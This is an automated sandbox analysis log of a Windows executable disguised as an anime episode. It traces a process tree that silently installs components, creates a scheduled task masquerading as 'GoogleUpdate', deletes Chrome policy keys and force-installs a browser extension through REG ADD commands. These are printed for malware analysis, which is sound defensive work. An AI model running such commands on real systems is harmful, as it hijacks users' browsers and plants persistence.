Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_00042D504_2_00042D50
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_0003FE154_2_0003FE15
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000C69CC5_2_000C69CC
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000DC0FA5_2_000DC0FA
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000B61845_2_000B6184
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000E022D5_2_000E022D
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000EA3B05_2_000EA3B0
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000E06625_2_000E0662
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000BA7EF5_2_000BA7EF
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000EA85E5_2_000EA85E
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000DF9195_2_000DF919
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000E0A975_2_000E0A97
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000E2B215_2_000E2B21
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000EED4C5_2_000EED4C
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000E2D505_2_000E2D50
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000DFE155_2_000DFE15
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: String function: 0005061A appears 34 times
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: String function: 00011F20 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: String function: 000531C7 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: String function: 000137D3 appears 496 times
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: String function: 0005012F appears 677 times
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: String function: 000F012F appears 678 times
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: String function: 000F061A appears 34 times
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: String function: 000B1F20 appears 54 times
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: String function: 000F31C7 appears 83 times
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: String function: 000B37D3 appears 496 times
Source: Boku no Hero Academia 6th Season - Episode 13.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: Boku no Hero Academia 6th Season - Episode 13.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: mfc140deu.dll.15.drStatic PE information: No import functions for PE file found
Source: mfc140rus.dll.15.drStatic PE information: No import functions for PE file found
Source: mfc140cht.dll.15.drStatic PE information: No import functions for PE file found
Source: mfc140jpn.dll.15.drStatic PE information: No import functions for PE file found
Source: mfc140kor.dll.15.drStatic PE information: No import functions for PE file found
Source: mfc140fra.dll.15.drStatic PE information: No import functions for PE file found
Source: mfc140chs.dll.15.drStatic PE information: No import functions for PE file found
Source: mfc140esn.dll.15.drStatic PE information: No import functions for PE file found
Source: mfc140ita.dll.15.drStatic PE information: No import functions for PE file found
Source: mfc140enu.dll.15.drStatic PE information: No import functions for PE file found
Source: Boku no Hero Academia 6th Season - Episode 13.exe, 00000000.00000003.255058911.00000000022E8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs Boku no Hero Academia 6th Season - Episode 13.exe
Source: Boku no Hero Academia 6th Season - Episode 13.exe, 00000000.00000000.243931389.00000000004C6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs Boku no Hero Academia 6th Season - Episode 13.exe
Source: Boku no Hero Academia 6th Season - Episode 13.exe, 00000000.00000003.244618238.0000000002520000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs Boku no Hero Academia 6th Season - Episode 13.exe
Source: Boku no Hero Academia 6th Season - Episode 13.exe, 00000000.00000003.245016813.000000007FBD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs Boku no Hero Academia 6th Season - Episode 13.exe
Source: Boku no Hero Academia 6th Season - Episode 13.exe, 00000002.00000003.410259634.00000000022D8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs Boku no Hero Academia 6th Season - Episode 13.exe
Source: Boku no Hero Academia 6th Season - Episode 13.exeBinary or memory string: OriginalFileName vs Boku no Hero Academia 6th Season - Episode 13.exe
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dll
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKLM\SOFTWARE\Policies\Google\Chrome /f
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeFile read: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeJump to behavior
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeProcess created: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp "C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp" /SL5="$30408,24635135,780800,C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe"
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess created: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe "C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe" /SILENT
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeProcess created: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp "C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp" /SL5="$2040C,24635135,780800,C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe" /SILENT
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess created: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe "C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe" /install /quiet
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeProcess created: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe "C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe" -burn.clean.room="C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe" -burn.filehandle.attached=588 -burn.filehandle.self=628 /install /quiet
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeProcess created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exe "C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{E9871BE9-995B-4EFF-BA27-126D1FC36700} {ED4F63C9-39F6-4A7D-A76D-4B8F059F42ED} 5372
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: unknownProcess created: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" /burn.runonce
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" /quiet /burn.log.append "C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20230102153454.log" /install
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" -burn.filehandle.attached=588 -burn.filehandle.self=564 /quiet /burn.log.append "C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20230102153454.log" /install
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=1008 -burn.embedded BurnPipe.{652D427C-3FCF-4F57-9B0A-0FFBCA2578FC} {CF7111B3-FF83-47BF-A56D-0E99B89A84C1} 5468
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.filehandle.attached=540 -burn.filehandle.self=564 -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=1008 -burn.embedded BurnPipe.{652D427C-3FCF-4F57-9B0A-0FFBCA2578FC} {CF7111B3-FF83-47BF-A56D-0E99B89A84C1} 5468
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{9F679354-B01C-4132-8C3B-9D0B8BAD9686} {7ADE5D70-631D-453D-B602-70E5C1B36EAF} 3732
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=900 -burn.embedded BurnPipe.{8ADE75BE-8C64-4D11-B05A-A6C78AECD63F} {6EE058D7-D097-43E8-87F0-A357D97D5238} 1324
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.filehandle.attached=576 -burn.filehandle.self=572 -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=900 -burn.embedded BurnPipe.{8ADE75BE-8C64-4D11-B05A-A6C78AECD63F} {6EE058D7-D097-43E8-87F0-A357D97D5238} 1324
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{DC57C196-DCD2-4148-818F-F83AAF0E5C46} {63FE371D-956D-4D2B-988F-00929D1EE668} 2140
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess created: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe "C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe" install
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\WindowsApp\chrome.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Local\WindowsApp\reg.xml" /tn GoogleUpdate
Source: unknownProcess created: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\WindowsApp\reg.bat" install
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Local\WindowsApp\reg.xml" /tn GoogleUpdate
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\WindowsApp\chrome.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKLM\SOFTWARE\Policies\Google\Chrome /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKLM\SOFTWARE\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKLM\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d dbffglanhdhedkjkijpkplhpcdndpchj /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj" /v "path" /t REG_SZ /d "C:\Users\user\AppData\Local\WindowsApp\apps-helper\apps.crx" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj" /v "version" /t REG_SZ /d 1.0 /f
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeProcess created: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp "C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp" /SL5="$30408,24635135,780800,C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess created: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe "C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe" /SILENTJump to behavior
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeProcess created: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp "C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp" /SL5="$2040C,24635135,780800,C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe" /SILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess created: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe "C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe" /install /quietJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess created: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe "C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe" installJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\WindowsApp\reg.bat" installJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeProcess created: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe "C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe" -burn.clean.room="C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe" -burn.filehandle.attached=588 -burn.filehandle.self=628 /install /quietJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeProcess created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exe "C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{E9871BE9-995B-4EFF-BA27-126D1FC36700} {ED4F63C9-39F6-4A7D-A76D-4B8F059F42ED} 5372Jump to behavior
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=1008 -burn.embedded BurnPipe.{652D427C-3FCF-4F57-9B0A-0FFBCA2578FC} {CF7111B3-FF83-47BF-A56D-0E99B89A84C1} 5468Jump to behavior
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" /quiet /burn.log.append "C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20230102153454.log" /install
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" -burn.filehandle.attached=588 -burn.filehandle.self=564 /quiet /burn.log.append "C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20230102153454.log" /install
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.filehandle.attached=540 -burn.filehandle.self=564 -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=1008 -burn.embedded BurnPipe.{652D427C-3FCF-4F57-9B0A-0FFBCA2578FC} {CF7111B3-FF83-47BF-A56D-0E99B89A84C1} 5468
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{DC57C196-DCD2-4148-818F-F83AAF0E5C46} {63FE371D-956D-4D2B-988F-00929D1EE668} 2140
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=900 -burn.embedded BurnPipe.{8ADE75BE-8C64-4D11-B05A-A6C78AECD63F} {6EE058D7-D097-43E8-87F0-A357D97D5238} 1324
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.filehandle.attached=576 -burn.filehandle.self=572 -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=900 -burn.embedded BurnPipe.{8ADE75BE-8C64-4D11-B05A-A6C78AECD63F} {6EE058D7-D097-43E8-87F0-A357D97D5238} 1324
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\WindowsApp\chrome.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Local\WindowsApp\reg.xml" /tn GoogleUpdate
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\WindowsApp\chrome.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Local\WindowsApp\reg.xml" /tn GoogleUpdate
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKLM\SOFTWARE\Policies\Google\Chrome /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKLM\SOFTWARE\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKLM\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d dbffglanhdhedkjkijpkplhpcdndpchj /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj" /v "path" /t REG_SZ /d "C:\Users\user\AppData\Local\WindowsApp\apps-helper\apps.crx" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj" /v "version" /t REG_SZ /d 1.0 /f
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_000144E9 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,4_2_000144E9
